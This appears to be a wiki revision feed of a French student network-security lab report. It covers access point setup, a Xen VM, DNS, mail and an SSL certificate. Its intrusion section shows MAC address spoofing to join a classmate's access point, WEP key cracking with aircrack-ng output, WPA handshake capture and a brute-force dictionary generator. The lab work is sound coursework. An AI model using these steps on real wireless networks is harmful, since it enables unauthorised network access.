          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès Cisco &amp;lt;/h3&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du Wifi sur l'eeePC&amp;lt;/h3&amp;gt;&lt;br /&gt;
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.&lt;br /&gt;
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. &lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Installation des systèmes d'exploitation &amp;lt;/h1&amp;gt;&lt;br /&gt;
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.&lt;br /&gt;
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.&lt;br /&gt;
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. &lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h2&amp;gt;Installation de la machine virtuel&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie concerne l’installation du machine virtuel Xen.&lt;br /&gt;
Nous installons Xen car celui-ci permet de faire de la  paravirtualisation. &lt;br /&gt;
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps &lt;br /&gt;
&lt;br /&gt;
Les étapes a suivre pour l’installation de Xen sur cordouan:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration de Xen:&lt;br /&gt;
- On autorise les connexion ssh en root&lt;br /&gt;
- On retire Network Manger pour configurer la connexion au réseau manuellement &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage systemd &lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@chien:~# apt-get install vim strace tcpdump &lt;br /&gt;
root@chien:~# apt-get install host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Services Internet &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Serveur DNS&amp;lt;/h2&amp;gt;&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cat /etc/bind/named.conf.options &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
host -t ni love-in-the-world.space&lt;br /&gt;
host -t any love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
cat db.love-in-the-world &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
cat /var/log/daemon.log&lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
service bind9 stop&lt;br /&gt;
service bind9 start&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Recuperation du certificat SSL&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur &lt;br /&gt;
&lt;br /&gt;
Instalation et Configuration de la boite Mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  apt-get install postfix bsd-mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
configuration de la boite mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #nano /etc/aliases&lt;br /&gt;
   postmaster:    root&lt;br /&gt;
   admin: root&lt;br /&gt;
 &lt;br /&gt;
 #newaliases&lt;br /&gt;
 #mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail &lt;br /&gt;
E-mail: admin@love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
Verfification:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#mailx&lt;br /&gt;
From Maxime.Strunc@polytech-lille.net  Fri Nov 20 13:22:24 2015&lt;br /&gt;
Return-Path: &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Original-To: admin@love-in-the-world.space&lt;br /&gt;
Delivered-To: admin@love-in-the-world.space&lt;br /&gt;
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])&lt;br /&gt;
	by chien (Postfix) with ESMTP id E7DA93421F&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 13:22:24 +0100 (CET)&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])&lt;br /&gt;
	(Authenticated sender: mstrunc)&lt;br /&gt;
	by peronne.escaut.net (Postfix) with ESMTPA id 305081C38&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 11:33:52 +0100 (CET)&lt;br /&gt;
MIME-Version: 1.0&lt;br /&gt;
Content-Type: text/plain; charset=UTF-8;&lt;br /&gt;
 format=flowed&lt;br /&gt;
Content-Transfer-Encoding: 7bit&lt;br /&gt;
Date: Fri, 20 Nov 2015 11:33:52 +0100&lt;br /&gt;
From: Maxime Strunc &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
To: &amp;lt;admin@love-in-the-world.space&amp;gt;&lt;br /&gt;
Subject: Hello&lt;br /&gt;
Message-ID: &amp;lt;478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Sender: Maxime.Strunc@polytech-lille.net&lt;br /&gt;
User-Agent: Roundcube Webmail/0.7.2&lt;br /&gt;
Status: RO&lt;br /&gt;
&lt;br /&gt;
Hey it's working&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
- Recupération du Certificat:&lt;br /&gt;
Je vais sur Gandi.net&lt;br /&gt;
&lt;br /&gt;
génération de la CSR&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@chien:~#   openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr&lt;br /&gt;
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : &lt;br /&gt;
admin@love-in-the-world.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres avoir renseigner tout les champs, &lt;br /&gt;
j'obtient la CSR: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
       ... texte crypter...&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Je la copie dans l'emplacement voulue sur gandi.net&lt;br /&gt;
&lt;br /&gt;
Gandi m'envoi un mail a l'adresse informée &amp;quot;admin@love-in-the-world.space&amp;quot;&lt;br /&gt;
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.&lt;br /&gt;
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt&lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h1&amp;gt;Test d'intrusion &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci.  &lt;br /&gt;
&lt;br /&gt;
Changement d'adresse MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On change la cles par: 0000000000&lt;br /&gt;
et le SSID : T1&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key 0000000000&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Préparation aux cassage de clés&amp;lt;/h2&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WEP &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w&lt;br /&gt;
fcracotte06&lt;br /&gt;
&lt;br /&gt;
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ls&lt;br /&gt;
aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                 [00:06:58] Tested 965565 keys (got 60459 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) &lt;br /&gt;
    1    0/  1   AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) &lt;br /&gt;
    2    0/  1   AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) &lt;br /&gt;
    3    4/  5   AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) &lt;br /&gt;
    4    0/  1   AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) &lt;br /&gt;
    5    0/  1   AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) &lt;br /&gt;
    6    0/  1   AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) &lt;br /&gt;
    7    0/  1   AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) &lt;br /&gt;
    8    0/  1   AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) &lt;br /&gt;
    9    0/  3   D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) &lt;br /&gt;
   10    0/  1   5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) &lt;br /&gt;
   11   13/  1   48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) &lt;br /&gt;
   12    0/  1   BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WPA&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie consiste a casser une clés WPA par force brute.&lt;br /&gt;
Je m'interesse plus particulierement a caracotte06 comme précédament.&lt;br /&gt;
 &lt;br /&gt;
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake.   &lt;br /&gt;
&lt;br /&gt;
Recuperation du Handshake: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06&lt;br /&gt;
&lt;br /&gt;
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
creation d'un dictionaire :&lt;br /&gt;
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.&lt;br /&gt;
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Cassage de la cles: &lt;br /&gt;
après avoir récuperer le Handshake du Wifi carotte06&lt;br /&gt;
Je vais casser la clés en utilisant mon dictionnaire &amp;quot;Dico&amp;quot; le fichier &amp;quot;wpacracotte06-02.cap&amp;quot;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23130</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23130"/>
				<updated>2015-11-22T18:01:20Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h1&amp;gt;Configuration du point d’accès&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Restriction par adresse MAC &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès Cisco &amp;lt;/h3&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
